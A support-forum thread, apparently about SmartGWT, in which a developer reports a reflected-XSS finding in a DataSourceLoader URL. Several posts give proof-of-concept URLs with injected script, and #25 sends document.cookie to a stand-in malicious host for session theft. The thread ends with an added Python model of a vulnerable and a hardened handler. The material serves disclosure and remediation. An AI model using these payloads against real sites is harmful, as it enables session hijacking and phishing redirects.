    #16
    I have tried using data source fields for combo box and it works fantastic. Please find the screen attached.

    Many thanks for your help


      #17
      We are going through our security audit. I am getting hit with an XSS issue on my application. Is there a way I can set this for all my data sources?

      Can I set escapeHTML=true in my DS? For each field?

      Thanks,



        #18
        We don't have a single setting at the DataSource level that sets this property for all fields - you have to set it for each field you care about directly.



          #19
          I have an application that is retrieving data and I am adding some additional filters on the retrieve. The URL that is generated by smartGWT to make this call is:

          https://esdqa.halliburton.com/download/download/sc/DataSourceLoader?dataSource=Preference%3csCrIpT%3ealert(31337)%3c%2fsCrIpT%3e%2cAnnouncement%2cLSMAuthenticationDMI%2cesd_log_history%2cEsdUserPrefDMI%2cPsContactInfoDMI%2cPreferenceDMI


          Our security team is saying that this URL has a vulnerability. Can you help me fix this? Where do I have to decode all my variables...

          Thanks,



            #20
            All this request is doing is sending names of DataSources to download, it isn't sending actual data. The only response the server can make from this request is the serialized forms of the named DataSources, which are defined securely on the server. Could you tell us what exactly the perceived vulnerability is?



              #21
              Is there a way you can just, from the framework, encode the URL string before we send it across the wire?



                #22
                This is not a security vulnerability and we do not plan any changes in this area. If you believe there is a vulnerability here, please provide a runnable sample of an exploit that is made possible because DataSource names are not encoded.



                  #23
                  I am assuming the server code is validating the URL before it gets converted to an RMI call.

                  I agree that it is not processing certain unacceptable values, but importantly the string should also disallow these characters:
                  < > - ' " / \ ( ) @ * to prevent script execution.



                    #24
                    There is no way for special characters to lead to script execution, and RMI is not involved. Again, if you disagree, please provide exploit code.



                      #25
                      Step 1: The malicious user sends an email to the Halliburton user enticing him to navigate to the following URL:

                      https://esdqa.halliburton.com/download/download/sc/DataSourceLoader?dataSource=Preference%3csCrIpT%3edocument.location="%68%74%74%70%3a%2f%2f%77%77%77%2e%67%6f%6f%67%6c%65%2e%63%6f%6d";%3c%2fsCrIpT%3e%2cAnnouncement%2cLSMAuthenticationDMI%2cesd_log_history%2cEsdUserPrefDMI%2cPsContactInfoDMI%2cPreferenceDMI

                      Note: Assuming http://www.google.com as a malicious page. In the wild, the attacker would replace it with his own page.

                      Step 2: The Halliburton user clicks the link and gets redirected to the attacker's malicious page.

                      Moreover, to escalate the attack, the attacker can also use document.cookie value to steal the user's current session ID. For example:

                      https://esdqa.halliburton.com/download/download/sc/DataSourceLoader?dataSource=Preference%3csCrIpT%3edocument.location="http://malicious.com/steal.php?giveme=+'document.cookie'";%3c%2fsCrIpT%3e%2cAnnouncement%2cLSMAuthenticationDMI%2cesd_log_history%2cEsdUserPrefDMI%2cPsContactInfoDMI%2cPreferenceDMI



                        #26
                        ?? This could only happen if the server were bouncing that encoded script back to the client for evaluation, which it will not do:

                        "The only response the server can make from this request is the serialized forms of the named DataSources, which are defined securely on the server."

                        If you actually try to browse to the link you are suggesting is an exploit, you will see that the server just complains that you haven't provided a proper dataSource parameter.



                          #27
                          The link below will redirect you to Google.com

                          https://esdqa.halliburton.com/download/download/sc/DataSourceLoader?dataSource=Preference%3csCrIpT%3edocument.location="%68%74%74%70%3a%2f%2f%77%77%77%2e%67%6f%6f%67%6c%65%2e%63%6f%6d";%3c%2fsCrIpT%3e%2cAnnouncement%2cLSMAuthenticationDMI%2cesd_log_history%2cEsdUserPrefDMI%2cPsContactInfoDMI%2cPreferenceDMI



                            #28
                            I am not sure why, when I post this message, the URL is posted with some spaces in it.

                            https://esdqa.halliburton.com/download/download/sc/DataSourceLoader?dataSource=Preference%3csCrIpT%3edocument.location="%68%74%74%70%3a%2f%2f%77%77%77%2e%67%6f%6f%67%6c%65%2e%63%6f%6d";%3c%2fsCrIpT%3e%2cAnnouncement%2cLSMAuthenticationDMI%2cesd_log_history%2cEsdUserPrefDMI%2cPsContactInfoDMI%2cPreferenceDMI



                              #29
                              Obviously you are not replying to my query on this. However, we do have an issue and it needs to be resolved at the framework level or at my level. Would you say running my criteria through an HTML encoder will work?

                              I still think it may be easier on your side since you control the code. In other words, if you add an overloaded function to encode the data, that should take care of everything.

                              Thanks,



                                #30
                                Ah, so the problem is specifically the error response for bad DataSource names. Please be more clear in the future, as you originally reported this as some kind of issue with URL encoding and/or with how the framework loads DataSources (which is not a valid issue).

                                To prevent this, you can add error handling code to DataSourceLoader that does not send back a friendly response in the case of a missing DataSource. However we have just changed the framework to deal with this automatically, and the change will be present in the next nightly build.
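The thread's resolution in #30 is that the weakness was never in how DataSource names travel in the URL, but in an error path that reflected an unknown name straight into a friendly HTML response. The model below is an added example written for this thread; it is Python, not Isomorphic's Java DataSourceLoader servlet, and the serialized DataSource bodies are constructed stand-ins. The DataSource names and the first URL are the ones posted in #19; loader_before is a constructed "before" that reproduces the reflecting error response, and loader_after shows the two defences a reviewer would ask for: reject names that are not plain identifiers without echoing them, and serve any error as escaped plain text rather than HTML.

```python
import html
import re
from urllib.parse import parse_qs, urlparse

# Names taken from the URL posted in #19. The serialized bodies are constructed
# stand-ins for whatever the real server would emit for each DataSource.
KNOWN_DATASOURCES = {
    "Preference": "isc.DataSource.create({ID:'Preference'})",
    "Announcement": "isc.DataSource.create({ID:'Announcement'})",
    "LSMAuthenticationDMI": "isc.DataSource.create({ID:'LSMAuthenticationDMI'})",
    "esd_log_history": "isc.DataSource.create({ID:'esd_log_history'})",
    "EsdUserPrefDMI": "isc.DataSource.create({ID:'EsdUserPrefDMI'})",
    "PsContactInfoDMI": "isc.DataSource.create({ID:'PsContactInfoDMI'})",
    "PreferenceDMI": "isc.DataSource.create({ID:'PreferenceDMI'})",
}

# A DataSource ID is an identifier; anything else is rejected before it can be echoed.
NAME_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")
SCRIPT_TAG = re.compile(r"<\s*script", re.IGNORECASE)

LOADER = "https://esdqa.halliburton.com/download/download/sc/DataSourceLoader"
# The request quoted in #19 (the %3c/%3e sequences decode to a script tag).
PAYLOAD_URL = (LOADER + "?dataSource=Preference%3csCrIpT%3ealert(31337)%3c%2fsCrIpT%3e"
               "%2cAnnouncement%2cLSMAuthenticationDMI%2cesd_log_history%2cEsdUserPrefDMI"
               "%2cPsContactInfoDMI%2cPreferenceDMI")
# Constructed: a well-formed request, and one naming a DataSource that does not exist.
GOOD_URL = LOADER + "?dataSource=Preference%2cAnnouncement%2cPreferenceDMI"
UNKNOWN_URL = LOADER + "?dataSource=Preference%2cNope"


def datasource_names(url):
    """Return the comma-separated dataSource parameter, URL-decoded, as a list."""
    query = parse_qs(urlparse(url).query, keep_blank_values=True)
    return query.get("dataSource", [""])[0].split(",")


def loader_before(url):
    """Constructed 'before': a friendly HTML error that reflects the raw names.

    Returns (status, content_type, body). The attacker-controlled name lands
    unescaped inside text/html, so the browser interprets the reflected tag.
    """
    names = datasource_names(url)
    missing = [n for n in names if n not in KNOWN_DATASOURCES]
    if missing:
        body = ("<html><body>Could not find DataSource(s): "
                + ", ".join(missing) + "</body></html>")
        return 200, "text/html", body
    return 200, "application/javascript", "\n".join(KNOWN_DATASOURCES[n] for n in names)


def loader_after(url):
    """Hardened handler: validate first, never reflect into HTML.

    1. Names that are not plain identifiers are refused with a fixed message,
       so the malformed value is never written back at all.
    2. A well-formed but unknown name is reported as escaped plain text, so even
       a browser that renders the error sees inert characters, not markup.
    """
    names = datasource_names(url)
    if any(not NAME_RE.match(n) for n in names):
        return 400, "text/plain; charset=utf-8", "Invalid dataSource parameter"
    missing = [n for n in names if n not in KNOWN_DATASOURCES]
    if missing:
        return (404, "text/plain; charset=utf-8",
                "Unknown DataSource(s): " + html.escape(", ".join(missing)))
    return 200, "application/javascript", "\n".join(KNOWN_DATASOURCES[n] for n in names)


def echoes_script(response):
    """Detection check: does an HTML response carry a script tag back to the client?"""
    _status, content_type, body = response
    return content_type.startswith("text/html") and bool(SCRIPT_TAG.search(body))


if __name__ == "__main__":
    for label, handler in (("before", loader_before), ("after", loader_after)):
        status, ctype, body = handler(PAYLOAD_URL)
        print(f"{label}: {status} {ctype} reflects script={echoes_script((status, ctype, body))}")
        print("   ", body[:90])
```

Running the block shows the "before" handler answering the #19 request with 200 text/html containing the reflected tag, while the "after" handler answers 400 with a fixed plain-text message. The same two rules (validate the identifier, escape and use a non-HTML content type on any error) are what the #29 question about an HTML encoder amounts to, applied at the one place where user input was actually being written into a response.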
